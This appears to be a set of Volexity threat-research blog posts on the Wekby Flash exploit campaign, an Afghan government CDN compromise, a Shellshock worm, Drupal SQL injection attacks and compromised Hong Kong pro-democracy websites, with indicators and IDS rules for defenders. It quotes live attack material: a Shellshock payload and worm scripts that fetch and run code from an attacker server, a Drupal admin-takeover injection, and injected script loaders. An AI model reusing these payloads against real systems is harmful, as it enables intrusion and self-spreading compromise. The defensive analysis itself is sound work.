Attackers are continuing to find new ways to use and abuse systems for long term persistent access to networks and systems of interest. This problem is not remotely unique to Cisco Web VPNs. Any other VPN, web server, or appliance that an attacker can gain administrative access to or otherwise customize/modify will potentially present similar risks. As recently made apparent through public disclosures of various backdooring methods, such as SYNful Knock, no device within a network is off-limits to motivated attackers. When proactively hunting for threat activity on your network and, in particular, when conducting an incident response to an active intrusion, be sure to leave no stone left unturned.

APT Group Wekby Leveraging Adobe Flash Exploit (CVE-2015-5119)

As if the recent breach and subsequent public data dump involving the Italian company Hacking Team wasn’t bad enough, it all gets just a little bit worse. Emerging from the bowels of Hacking Team data dump was a Flash 0-day exploit (CVE-2015-5119) that was just patched today by Adobe as covered in APSB15-16. The exploit has since been added into the Angler Exploit Kit and integrated into Metasploit. However, not to be out done, APT attackers have also started leveraging the exploit in targeted spear phishing attacks as well. Before we start dishing the details, there is going to be one main takeaway from this blog post: If you haven’t already, update/patch your Adobe Flash now.

Spear Phishing

This morning, a well known APT threat group, often referred to as Wekby, kicked off a rather ironic spear phishing campaign. The attackers launched spoofed e-mail messages purporting to be from Adobe. The e-mail messages references an Adobe Flash update and encourage the recipients to click a link to download and install the update. Take a look at an example of the spear phish e-mail message below.

wekby-adobe-phish

The visible and spoofed source e-mail address for “Andre Vangils” is avangils@adobe.com. This is not a particularly advanced spear phish message. However, the visible link http://get.adobe.com, as you have likely guessed, does not actually go to Adobe’s website. Instead it leads to index.htm on an IP address belonging to a hosting provider named PEG TECH INC. This page is far less helpful than one would hope. Instead of providing a legitimate Adobe Flash update, the page loads a malicious SWF file instead. The following contents are found from the HTML page from the link:

<body>
<div style=”position:fixed; top:50%; left:50%; width:600; height:400; margin-left:-300; margin-top:-200;”>
<object classid=”clsid:D27CDB6E-AE6D-11cf-96B8-444553540000″ id=”swf” width=”600″ height=”400″>
<param name=”movie” value=”movie.swf” />
<param name=”allowScriptAccess” value=”always” />
<embed src=”movie.swf” width=”600″ height=”400″ allowScriptAccess=”always” type=”application/x-shockwave-flash” />
</object>
</div>
</body>
</html>

If you guess this was a Flash exploit, then you are 100% correct.

Exploits and Malware

The aforementioned exploit works on Adobe Flash versions all the way up to 18.0.0.194. You need to have updated your Flash since this morning to be safe from its grips. The attackers appear to have modified one of the exploits that came from the Hacking Team dump. Unlike most of the other versions we have observed up until this point, this SWF file is LZMA compressed and has the ZWS file header. There are plenty of great tools out there that can be used to look at Flash files. One of our favorites is SWF Investigator from Adobe. Poking around a bit we can see a few interesting labels that appear to reference Hacking Team, such as the one shown below:

 

ht-framelabel

Notice the “HT_exploit” label. Further down in the file is a class with the same name. These appear to be not so subtle references to the source of this exploit. We did not see these labels or class names in any of the other files we observed thus far, so we presume these were recently created as part of this new exploit file. At the end of the day, the goal of this attack is to install malware on target systems. If a vulnerable system were to visit the exploit site from the spear phish message, this is exactly what would happen. In this case the flash file would drop an executable into the victim user’s Temp directory similar to the path shown below:

C:\Users\$Username\AppData\Local\Temp\Rdws.exe

The malware would then execute and immediately start beaconing to the Singapore IP address 223.25.233.248 on TCP port 80. This is a well known Wekby command and control (C2) IP address that has been used for years. Currently there a few other active DNS names that resolve to IP such as gmail.bkz88.com and info.imly.org.  Any connection involving this IP address or these hostnames should be consider hostile and a likely indicator of compromise.

The 223.25.233.248 IP address has served as a C2 server for a variety of different malware in the past (Poison Ivy, Gh0st, Remote RSS, etc.). However, this go around the malware is a modified version of the Gh0st remote access trojan (RAT). Typically the default version of Gh0st sends a packet flag of “Gh0st” in the first 5-bytes. This has been heavily modified over the years and several custom versions of Gh0st have emerged with dozens and dozens of customer packet flags such as cb1st, Winds, https, and so on. However, the Wekby APT actor last year started using a modified version that has an 18 character packet flag. This version was reused in this attack and an infected system will send a rather peculiar packet flag as seen in the image below:

symc-gh0st

You are reading that correctly, it’s sending: HTTP\1.1 Sycmentec. Presumably this is a poor attempt to blend in as HTTP traffic and appear to be affiliated with Symantec. There are plenty of signatures in the Emerging Threats rulesets to pick up on Gh0st, but you can use the signature below to pickup on this specific instance of Gh0st.

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:”Volexity – Wekby Gh0st Variant [HTTP\1.1 Sycmentec]”; flow:to_server,established; content:”HTTP|5c|1.1 Sycmentec”; depth:18; sid:201507081;)

You can add in a check for two null bytes followed by  zlib header (“|000789c|”) for an additional match. However, chances are a hit on that string by itself is probably bad news and solid enough. Add a rule for the reverse direction to catch the server’s response as well.

Also, pretty interesting and funny is what happens is your version of Flash is up-to-date when you visit the exploit page. Instead of silently failing in the background, it instead results in the rather obvious popup:

faile

Your eyes are not deceiving you. It says faile! right on the screen. It looks like the attackers may have left a debug message from their testing. Not very subtle at all.

File Details and Persistence

Here’s what to look for when it comes to file indicators.

Filename movie.swf
File size 214976 bytes
MD5 079a440bee0f86d8a59ebc5c4b523a07
SHA1 7389e78cca58de6cb2cbe2b631d2fec259e9cdcc
Notes Malicious flash file that drops Wekby Gh0st RAT.
Filename Rdws.exe
File size 138240 bytes
MD5 cfbcb83f8515bd169afd0b22488b4430
SHA1 959638ee177b51bda8701c10258b4956f8b1c367
Notes HTTP\1.1 Sycmentec packet flag malware.

The malware sets its persistence adding an entry to the HKCU “RUN” key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run):

NAME: CSics
DATA: C:\Users\$User\AppData\Local\Rdws.exe

Conclusion

Volexity is aware of multiple other ongoing APT and non-APT cyber attacks leverage CVE-2015-5119. While it is always important to patch your software and keep it up-to-date, it is CRITICAL that you patch your Adobe Flash immediately. The attackers are having a field day with this exploit and will not slow down any time soon. Patching is the most prudent course of action to deal with this exploit that is very much in the wild. Additionally, as always, for Microsoft Windows users, looking at deploying the Enhance Mitigation Experience Toolkit (EMET) would also be advised.

 

Follow us on Twitter @Volexity.

Afghan Government Compromise: Browser Beware

Visiting a wide-ranging number of websites associated with the Government of Afghanistan may yield visitors an unwanted surprise. For the second time this year, malicious code has surfaced on, cdn.afghanistan.af, a host that serves as a content delivery network (CDN) for the Afghan government. Javascript code from this system is found on several different Afghan Offices, Ministries, and Authorities. This strategic web compromise (SWC) against the Afghan CDN server has effectively turned a large portion of the government’s websites into attack surfaces against visitors. Volexity recently detected malicious code being loaded after a user visited the websites for the President of Afghanistan (www.president.gov.af).

Second Round of Attacks

In a previous attack highlighted earlier in the year by ThreatConnect. One of the two primary Javascript files accessed from the CDN system was modified to load code from two different malicious URLs. In the past attacks, the following file was modified to load unwanted Javascript:

 http://cdn.afghanistan.af/scripts/gop-script.js

In these instances the offending code was easily identifiable, as the attackers simply prepended document.write statements to the very top of the gop-script.js file as seen below:

cdn_afghanistan_comp1

However, this new round of malicious code has two primary differences. The first difference is the attackers chose to modify a different file in this round. The offending code is no longer present in gop-script.js, as this file was cleaned up some time ago. However, malicious code is now found in the following Javascript code on the Afghan CDN website:

http://cdn.afghanistan.af/scripts/jquery-1.4.2.min.js

The next major difference is the attackers went through more of an effort to obfuscate their activity by appending their code to the end of the file and by leveraging the Dean Edwards Packer with base62 encoding. In this instance, the packer effectively makes it more difficult to discern exactly what the attackers have done just by looking at the code. The image below shows the malicious code as it currently appears within the jquery-1.4.2.min.js file:

cdn_afghanistan_jquery

Taking this Javascript and unpacking it results in a bit more recognizable code (note we have modified http to hxxp below):

document.write(‘<script type=”text/javascript” src=\”hxxp://176.58.101.24/Jquery/Jquery.js\”></script>’);

This code will cause a visitor to attempt to retrieve Javascript from the Linode IP address 176.58.101.24 and load it into the browser.

Selective Exploitation

One of the more interesting tactics that APT attackers have been employing in recent years is the usage of IP address whitelisting. Volexity believes that the attackers behind the Afghan Government compromise likely have a specific set of targets that are potential recipients of malicious code via the 176.58.101.24 address. In all observed instances thus far, only HTTP 403 (Forbidden) responses have been observed. This threat group has used similar tactics on other websites involved in strategic web compromises in the past as well. The only real way to identify the targets is to observe the code actually being seen, or see the whitelist from the server itself. At this point we can only speculate that Government and Defense entities are likely the intended targets of this campaign. If you check your logs and find HTTP 200 results, we would like to hear from you.

Network Indicators

The most straightforward and primary network indicator at this time is looking for for communication with the IP address 176.58.101.24. ASN details via the Shadowserver IP-BGP service are shown below.

$ whois -h asn.shadowserver.org ‘origin 176.58.101.24’
15830 | 176.58.96.0/19 | TELECITY | GB | linode.com | Linode LLC

 

A New Shellshock Worm on the Loose

In a blog post from September last year, we described some of the early Shellshock activity we were seeing in the wild. Since then we have continued to observe periodic scanning, which have by in large not been particularly noteworthy. That remained the case until just a little bit ago. Starting late in the afternoon on April 8, 2015, the frequency and breadth of scanning observed by Volexity increased fairly dramatically. A closer look at the activity reveals that a worm (of sorts) has been set loose on the Internet looking for vulnerable hosts to exploit over HTTP.

The inbound requests that have been observed look like this:

GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e ‘print “Content-Type: text/plain\r\n\r\nXSUCCESS!”;system(“cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* “);’
Host: <ip address>
Connection: Close

The first request contains a double HTTP/1.1 header. The Shellshock exploit attempt then comes via the User-Agent string. The attacking systems attempt the exploit against the following file paths on the targeted system (in this order):

/cgi-bin/php
/
/cgi-bin/bash
/cgi-bin/contact.cgi
/cgi-bin/defaultwebpage.cgi
/cgi-bin/env.cgi
/cgi-bin/fire.cgi
/cgi-bin/forum.cgi
/cgi-bin/hello.cgi
/cgi-bin/index.cgi
/cgi-bin/login.cgi
/cgi-bin/main.cgi
/cgi-bin/meme.cgi
/cgi-bin/php4
/cgi-bin/php5
/cgi-bin/php5-cli
/cgi-bin/recent.cgi
/cgi-bin/sat-ir-web.pl
/cgi-bin-sdb/printenv
/cgi-bin/test-cgi
/cgi-bin/test.cgi
/cgi-bin/test-cgi.pl
/cgi-bin/test.sh
/cgi-bin/tools/tools.pl
/cgi-mod/index.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-sys/entropysearch.cgi
/cgi-sys/php5

If successful, the exploit attempts to perform the following actions:

  • Print “XSUCCESS!” back to the source system.
  • Change to a temporary directory on the system (/tmp or /var/tmp)
  • Remove any existing files named .c.txt and .d.txt
  • Download the file .c.txt from 109.228.25.87 using wget, curl, fetch, and lwp-download
  • Change the access permissions to the file .c.txt or any file starting with .c.txt in the directory in order to make it executable
  • Execute the file .c.txt or any file in the directory starting with .c.txt

Now, a further look at the file .c.txt shows it has the following contents:

rm -rf /tmp/* /tmp/.* &
rm -rf /var/tmp/* /var/tmp/.* &
cd /var/tmp/
cd /tmp
killall -9 scan brute f b r print pscan pnscan ps minerd &
sleep 10
wget http://109.228.25.87/.ips-80/cc.tar
curl -O http://109.228.25.87/.ips-80/cc.tar
sleep 5
tar xvf cc.tar
tar zxvf cc.tar
tar xvf  cc.tar.1
tar zxvf cc.tar.1
tar xzvf cc.tar
tar xzvf cc.tar.1
sleep 10
cd .cc
chmod +x *
nohup ./r &

After performing a few tasks, the script will download a tarball file from http://109.228.25.87/.ips-80/cc.tar.

Filename: cc.tar
File size: 51200 bytes
MD5 hash: 4d56cf72a5e9a64cffce2489f0c83a47
SHA1 hash: 826c881d0787f11f4acb7d3b27905c47d8e8d5b3
Notes: Tarball containing scripts and 32-bit and 64-bit scanning binaries.

Within this tarball file are the following files:

Filename: cgiscan32
File size: 12685 bytes
MD5 hash: b3f9345a6e2de5348645e8060ad1c8a9
SHA1 hash: d669bca815f44d54d81ba523ccfd187529394ee7
Notes: 32-bit ELF scanning binary (compiled sslvuln.c)

Filename: cgiscan64
File size: 15083 bytes
MD5 hash: 20fa3835528a5f28907dea9123117b02
SHA1 hash: a8ec2eb582c7011aee5c90ec0dcf5b48e7d14b5e
Notes: 64-bit ELF scanning binary (compiled sslvuln.c)

Filename: patch
File size: 556 bytes
MD5 hash: 23ea9aed18bdef6ef5efee3b5fbdde0c
SHA1 hash: 8062ef8840b5664e0c58e83224a68ba283b38aac
Notes: Text file with file paths to be scanned for Shellshock vulnerability.

Filename: paths
File size: 556 bytes
MD5 hash: 23ea9aed18bdef6ef5efee3b5fbdde0c
SHA1 hash: 8062ef8840b5664e0c58e83224a68ba283b38aac
Notes: Text file with file paths to be scanned for Shellshock vulnerability. Same file as “patch”.

Filename: print
File size: 490 bytes
MD5 hash: eba7062843a4161907758112f78642c6
SHA1 hash: dd411e6307f8142a8b67173748e4a46c8a2af654
Notes: Script used for reporting back IP addresses found to be vulnerable with Shellshock.

Filename: r
File size: 5463 bytes
MD5 hash: a15666421a3d34064bbb18a3449f1406
SHA1 hash: 586de34a05c09f235c61da9f0d54ec53d7c277ac
Notes: Script used to feed the “start” script file paths to be downloaded that contain blocks of IP addresses to be scanned.

Filename: start
File size: 437 bytes
MD5 hash: 62d07f41433c67e1120cd9e9a00135c5
SHA1 hash: f10e0a29e5f9e6cf21fbce04fe96eacb780e8b29
Notes: Script that initiates all IP range downloads, scanning, saving of vulnerable hosts, and then launches “print” to report back.

Attack Initiation

As can be seen from the file .c.txt, the last thing it does is launch the file r. The file r is a bash script which feeds another bash script, start, three letters as a parameter. The full contents of the file start are shown below:

#!/bin/bash
############### Config ###############
rm -rf scan.log
rm -rf vuln-ip.txt

wget http://109.228.25.87/.ips-80/$1
curl -O http://109.228.25.87/.ips-80//$1
fetch http://109.228.25.87/.ips-80/$1

cat $1* |sort -u >> scan.log
rm -rf $1*
sleep 1

if [ `getconf LONG_BIT` = “64” ]
then
./cgiscan64 scan.log v 50 patch
else
./cgiscan32 scan.log v 50 patch
fi

sleep 60
rm -rf t.log
cat vuln-ip.txt | sort -u >t.log
sleep 4
./print

 

As you can see, the first thing the script does is try to remove any existing copies of scan.log and vuln-ip.txt. After that, it then tries to download the file that was fed to it from the r script. It then appends the contents of the download to the file scan.log and removes the initial file. An example download of one such file would be from the URL http://109.228.25.87/.ips-80/xxx. That “xxx” is not a placeholder, that is an actual file on the server. The file “xxx” contains 26,356 IP addresses and starts with the IP 98.1.153.231 and ends with 98.120.200.16. Each of the various file chunks contain tens of thousands of IP addresses to be used for scanning.

The script then launches either the 32-bit or 64-bit version of an ELF scanning binary. Based on the contents of the file, it appears to be a modified version of a file called mass.c referenced as sslvuln.c that was found on a Romanian website. Notable strings in the binaries include:

GET %s%s HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e ‘print “Content-Type: text/plain\r\n\r\nXSUCCESS!”;system(“cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* “);’
Host: %s
Connection: Close

Nu Pot Deschide %s

vuln-tot.txt

vuln-ip.txt

As you can see, the binaries have the Shellshock download site we have observed embedded into the linux binaries. As a result, all systems that are successfully exploited then repeat the process that was just observed and effectively become part of the scanning/worm network. The cgiscan binaries log all vulnerable hosts they find to a file named vuln-ip.txt. Finally, at the end of the start script, once the current scanning activity has completed, it sorts, removes any duplicate entries, and stores all discovered vulnerable hosts into a file named t.log and launches another bash script named print. The full contents of the print bash script are shown below:

 

#!/bin/bash

if which wget >/dev/null; then

for i in `cat t.log|sort|uniq`
do
wget -O .tmp http://109.228.25.87/.c.php?request=”$i” &>/dev/null&
done
else

if which curl >/dev/null; then

for i in `cat t.log|sort|uniq`
do
curl -O http://109.228.25.87/.c.php?request=”$i” &>/dev/null&
rm -rf $i
done
else

if which fetch >/dev/null; then

for i in `cat t.log|sort|uniq`
do
curl -O http://109.228.25.87/.c.php?request=”$i” &>/dev/null&
rm -rf $i
done

fi

fi

fi

sleep 1

 

The script enumerates through the list of vulnerable hosts recorded in the file t.log and reports them back to the attacker’s server at 109.228.25.87 via the file .c.php by placing the IP address as a value to the request= URI parameter. This allows the attackers to maintain a list of systems that are vulnerable that they have managed to compromise.

Network Indicators

The most solid network indicator at this time is looking for any sort of outbound communication with the IP address 109.228.25.87. Utilizing the Shadowserver ASN lookup service, we see this system resides on an IP address at Fast Hosts Ltd.

$ whois -h asn.shadowserver.org ‘origin 109.228.25.87’
8560 | 109.228.0.0/18 | ONEANDONE | DE | fasthosts.com | Fast Hosts Ltd

Additionally, signatures can be leveraged with an IDS to look for the requests as well. Simple signatures that can be leveraged is shown below:

Suricata Format

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:”Volex – Possible Shellshock Worm Check-in Detected”; flow:established,to_server; content:”.c.php?request=”; http_uri;  sid:2015040901;)

Snort Format

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”Volex – Possible Shellshock Worm Check-in Detected”; flow:established,to_server; content:”.c.php?request=”; http_uri;  sid:2015040901;)

These signatures can be made more broad to just look for “.php?request=” and alternatively can be made more restrictive by adding a pcre check for an IP address as part of the URI (/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/).

 

A Long Story Short

To make a long story short, you should know there is a Shellshock worm, of sorts, going around again. Compromised systems are being added to the network of systems that are scanning for more vulnerable systems. This process is continuing to repeat. The “worm” requires that 109.228.25.87 be online for the files to be downloaded. However, even if this system goes offline, the attackers have still likely compiled a list of vulnerable systems through download logs and the check-in URL where scanning systems further report other vulnerable hosts they have discovered. It is recommended that you actively monitor for connections to 109.228.25.87. If you see traffic going there, you will likely need to deal with a multitude of malware on a system that has likely been compromised several times as a result of the Shellshock vulnerability.

 

Update 2015-04-09 12:14 UTC 

The malicious files housed at 109.228.25.87 appear to have been taken down and scanning activity appears to have slowed down fairly dramatically.

Drupal Vulnerability: Mass Scans & Targeted Exploitation

Yesterday (October 15, 2014), a critical SQL injection vulnerability in version 7 of the popular open source content management system (CMS) Drupal was disclosed by Stefan Horst and detailed in SA-CORE-2014-005. The description of the vulnerability is rather harrowing:

Drupal 7 includes a database abstraction API to ensure that queries executed against the database are sanitized to prevent SQL injection attacks.

A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution. Depending on the content of the requests this can lead to privilege escalation, arbitrary PHP execution, or other attacks.

This vulnerability can be exploited by anonymous users.

If you think this sounds pretty bad, you are spot on. Along with the advisory, a patch was released to fix the security issue. Unfortunately, patches are also often leveraged to identify exactly how to exploit such vulnerabilities. In this case, it was only hours later that PoC code on how to exploit the security issue was posted online. From that point it, has been off to the races by attackers. The first such instance of the code appearing that we have seen was on Reddit by the user fyukyuk. Not long after, someone further weaponized the code into a Python script and posted it to Pastebin here.

The following is the excerpt of the code that would need to be sent in a POST request to facilitate the SQL injection from fyukyuk’s example on Reddit:

name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in

If this code is executed properly on Drupal, it effectively updates the the account with the uid of 1 (admin) and sets the new username to “owned”. The password is then set to “thanks” and those credentials could then potentially be used to access Drupal as an administrator. We say potentially because there are other mitigating steps one could enact to prevent access, such as ACLs and two-factor authentication. However, given the scope of the vulnerability includes remote code execution, restricting access to the Drupal admin interface may be the least of one’s worries.

Targeted Attacks and Mass Scans in the Wild

Now, here is the bad news. Not only has the PoC code been online since October 15, attackers have also been mass scanning for this issue since then as well. We are aware of multiple confirmed breaches at various organizations as a result. Volexity has observed attacks against several of its customers in both indiscriminate and targeted capacities. Wide spread scanning has been observed against websites that are not even hosting Drupal. However, Volexity has also observed IP addresses associated with APT attackers specifically targeting websites of our customers.

In the cases where we have had packet capture to fully analyze the contents of the attacks, we have observed the attackers using the exact PoC code that has been posted online without changing it. The following HTTP Request was captured late last night from an attack on a patched Drupal server:

POST /?q=node&destination=node HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 253
Host: <removed>
Connection: keep-alive

name[0%20;update%2Busers%2Bset%2Bname%3d’owned’%2B,%2Bpass%2B%3d%2B’$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld’%2Bwhere%2Buid%2B%3d%2B’1′;;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log%2Bin

In this case, the attack appears to have been manual. Further examination of other log data available to Volexity has shown mass scanning with a variety of User-Agents being leveraged as well. So far, scans with the following User-Agents have been observed:

Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Mozilla/5.0 (Windows NT 5.2; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0
Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101
Python-urllib/2.6
Python-urllib/2.7

Version Reconnaissance – CHANGELOG.txt

In some of the targeted cases Volexity has observed thus far, the attackers requested a file that is often a remnant from Drupal installs and upgrades called CHANGELOG.txt. This file details the changes that have been made to Drupal with each release. More importantly is that above each set of changes is the version number in which they were made. If the file is left behind, the very first line will reveal what version of Drupal the server is running. In two cases Volexity observed the attackers requesting this file from the target server. In one case, the attackers did it prior to attempting their exploit. In the other they did it post exploit attempt. In both cases, the exploit failed as the server was patched yesterday afternoon. Volexity would recommend removing this file. The text below contains partial content from CHANGELOG.txt showing the patches and version number as observed on a Drupal 7 server:

Drupal 7.31, 2014-08-06
----------------------
- Fixed security issues (denial of service). See SA-CORE-2014-004.

Drupal 7.30, 2014-07-24
-----------------------
- Fixed a regression introduced in Drupal 7.29 that caused files or images
  attached to taxonomy terms to be deleted when the taxonomy term was edited
  and resaved (and other related bugs with contributed and custom modules).
- Added a warning on the permissions page to recommend restricting access to
  the "View site reports" permission to trusted administrators. See
  DRUPAL-PSA-2014-002.
- Numerous API documentation improvements.
- Additional automated test coverage.

Detection

Depending on what type of data you have to work with, there are various means to detect attacks. If you have access to web logs, you can grep them for the following text:

?q=node&destination=node

Results similar to the following may represent exploitation attempts:

119.57.189.115, 119.57.189.115 – – [16/Oct/2014:04:15:15 -0500] “POST //?q=node&destination=node HTTP/1.1” 200 “-” “Python-urllib/2.7”

This isn’t to say there aren’t other ways to encode the URLs and URI data, but it is what is currently prevalent.

Additionally, the following Suricata and Snort rules can be leveraged to detect the current round of attacks:

Suricata Format

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:”Volexity – Possible Drupal SA-CORE-2014-005 Exploit Attempt”; flow:established,to_server; content:”POST”; http_method; content:”?q=node&destination=node”; http_uri; content:”name[0%20|3b|update”; http_client_body;  threshold:type limit, track by_src, count 1, seconds 120; sid:2014101601;)

Snort Format

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTT_PORTS (msg:”Volexity – Possible Drupal SA-CORE-2014-005 Exploit Attempt”; flow:established,to_server; content:”POST”; http_method; content:”?q=node&destination=node”; http_uri; content:”name[0%20|3b|update”; http_client_body;  threshold:type limit, track by_src, count 1, seconds 120; sid:2014101601;)

These signatures are specific to what is being seen in the wild and will not detect all possible cases of such an attack. A more loose version of these rules could involve only examining the http_uri and removing the following content match.

Conclusion

The most important thing to do, if you haven’t already, is to patch immediately. Then examine your system, database, and logs to see if you have already been impacted. If you can’t log into your admin account any longer and see the account name is now ‘owned’, then you have already been compromised. However, this is just the cookie cutter in the wild exploit being used. Attackers can perform any number of other functions with this exploit and are not limited to what we have described thus far. If you have been breached or have major concerns that you have been, it may be time to build a new server and start with a fresh system build and the latest version of Drupal. Consider restricting access to your user and administrative interfaces and consider two-factor authentication integration from providers like Duo Security. Also, while you are at it, go ahead and delete CHANGELOG.txt.

 

Democracy in Hong Kong Under Attack

Over the last few months, Volexity has been tracking a particularly remarkable advanced persistent threat (APT) operation involving strategic web compromises of websites in Hong Kong and Japan. In both countries, the compromised websites have been particularly notable for their relevance to current events and the high profile nature of the organizations involved. In particular the Hong Kong compromises appear to come on the heels of the Occupy Central Campaign shifting into high gear. These compromises were discovered following the identification of malicious JavaScript that had been added to legitimate code on the impacted websites. This code meant that visitors were potentially subjected to exploit and malicious Java Applets designed to install malware on their systems. While investigating these cases, Volexity also discovered additional APT attack campaigns involving multiple other pro-democratic websites in Hong Kong. These attempts at exploitation, compromise, and digital surveillance are detailed throughout this post.

Compromised Pro-Democratic Hong Kong Websites

Warning: Many of these websites may still be compromised and present a risk to visitors. Browse with caution.

Alliance for True Democracy – Hong Kong

Over the last two days, Volexity has observed malicious code being served up from the website of the Alliance for True Democracy (ATD) in Hong Kong (www.atd.hk). ATD is an alliance of people and organizations dedicated to democracy and universal suffrage in Hong Kong. At the time of this writing malicious code is still live on the website, so please visit with care until the website is clean. Below is a screen shot of the malicious code references found pre-pended to a JavaScript file on the website named superfish.js.

atd-superfish.js-small

This JavaScript file is called from other parts of the website and effectively nests the loading of additional JavaScript written and interpeted as:

<script language=javascript src=http://java-se.com/o.js</script>

The domain name java-se.com is known bad and associated with APT activity. At the time of this post, the domain is hosted on the Japanese IP address 210.253.101.105.

7506 | 210.253.96.0/20 | INTERQ | JP | GMO.JP | GMO INTERNET INC.

Volexity has yet to actually see the contents of the file o.js, as the websites has continuously returned HTTP 403 responses each time it was requested. The file was requested from IP addresses throughout Asia without ever returning valid content. It’s unclear if this code is activated at certain times or if there is a whitelist of IPs restricting access to the file to specific targets. This same code has also been observed being served from another Hong Kong website described in the next section.

Webshell Backdoor

While examining the ATD website, Volexity also observed that the site had a password protected backdoor webshell placed on it. This is a fairly popular webshell that Volexity has encountered on several occasions when dealing with website compromises. Volexity refers to this shell as the Angel Webshell, named after its default password of “angel”. The shell will simply display the text “Password:”, a text input box, and a Login button. A screen shot of the webshell as observed on the ATD website can be seen below.

atd-angel-shell

Despite the shell being written in PHP and only displaying a simple Login prompt, it is easy to identify the Angel webshell based on unique components of its viewable HTML source code. The HTML source of this page is displayed in the following image.

atd-angel-shell-src

While Volexity operates under the assumption attackers have placed webshells on webservers they have compromised, in this particular instance it can be seen with certainty. Attackers will often upload new webshells or add simple China Chopper style modifications to legitimate existing files in an attempt to maintain persistence to these systems.

Democratic Party Hong Kong

In the last week, Volexity also observed both the English and Chinese language websites for the Democratic Party Hong Kong compromised with the same malicious code found ont he ATD website (www.dphk.org | eng.dphk.org). DPHK is a pro-democracy political party in Hong Kong. Like the ATD website, at the time of this writing the DPHK websites are also serving up malicious code, so please browse with caution. During our research for this post, we also became aware of multiple public reports related to the compromise of the DPHK website on both Twitter and via ThreatConnect. Our good friend Claudio Guarnieri posted the following tweet on October 3, 2014

The website of the Democratic Party of Hong Kong has been compromised and still is. Let them know.

Diving further into some of the replies to this tweet is a plethora of information regarding the exploit domain java-se.com. In particular, a tweet from Brandon Dixon with relevant data from the PassiveTotal project details several subdomains and IP addresses associated with java-se.com. While Volexity has only observed a handful of the hostnames in the wild thus far, other active subdomains suggest there could be additional on-going exploit or malware activity from the domain. Additional reporting on this activity and another going back to August 2014 was also recently shared on ThreatConnect. Despite all of this attention, the DPHK website is still compromised and references the JavaScript from the hostile domain.

It is also worth noting that this is not the first time that the DPHK website has been used in a strategic web compromise. Back in May 2011, Kaspersky Lab reported the website was being leveraged to target users with Flash Exploits. The DPHK appears to be of high value with respect to targeting visitors.

People Power – Hong Kong

During the course of investigating activity related to the ATD and DPHK websites, Volexity also observed that the website of the political coalition and pan-democratic organization People Power in Hong Kong (www.peoplepower.hk) had been compromised as well. However, unlike the other two websites, the People Power website did not contain JavaScript modifications pointing to java-se.com. Instead the website appears to have malicious iFrames leveraging the Chinese URL shortener 985.so. At the bottom of several of the pages for the People Power website are four iFrames as seen in this screen shot of the website source:

people-power-iframe

Those links, with the exception of the first one, all redirect to exploit pages on the Hong Kong IP address 58.64.178.77.

URL Meta Refresh Page
hXXp://985.so/bUYj N/A (HTTP 404)
hXXp://985.so/bUYe hXXp://58.64.178.77:80/SiteLoader
hXXp://985.so/b6hW hXXp://58.64.178.77/mPlayer
hXXp://985.so/bUYf hXXp://58.64.178.77:80/0wnersh1p

These pages load scripts that conduct profiling of the system for various software, plugins, and other related information, as well as load Java exploits designed to install malware on the target system. If successful, the exploits will install either a 32-bit or 64-bit version of the malware. Both files are found within the Java Archives files. Below are details on each of the malware files.

Filename: main.dll
File size: 13824 bytes
MD5 hash: 1befa2c2d1bfc8e87d52871c868f75fe
SHA1 hash: 8f81bb0bfa6b3ebf3ef4ea283b23a5ccae5b6817
Notes: 32-bit version of malware, which beacons to 58.64.178.77:443.

Filename: main64.dll
File size: 15872 bytes
MD5 hash: a482a84d13c76b950ce5bc7e75f4edef
SHA1 hash: c0a4b9145e0066f5c1534beddc9c666ea8eb0882
Notes: 64-bit version of malware, which beacons to 58.64.178.77:443.

At the time of this writing, the People Power website is still serving up malicious code. Volexity recommends avoiding this website and/or browsing with caution. Volexity believes a separate group of attackers is responsible for this exploit activity and that they are not affiliated with the java-se.com operations.

The Professional Commons – Hong Kong

While digging deeper into pro-democratic websites in Hong Kong, Volexity also discovered peculiar code on the website of a pro-democratic and pro-universal suffrage public policy think thank The Professional Commons (www.procommons.org.hk). In the case of this website, there is suspicious JavaScript code that writes an iFrame pointing back to a non-existent HTML page on a hotel website in South Korea. The code from the website can be seen in the screen shot below.

procommons-hotel-iframe

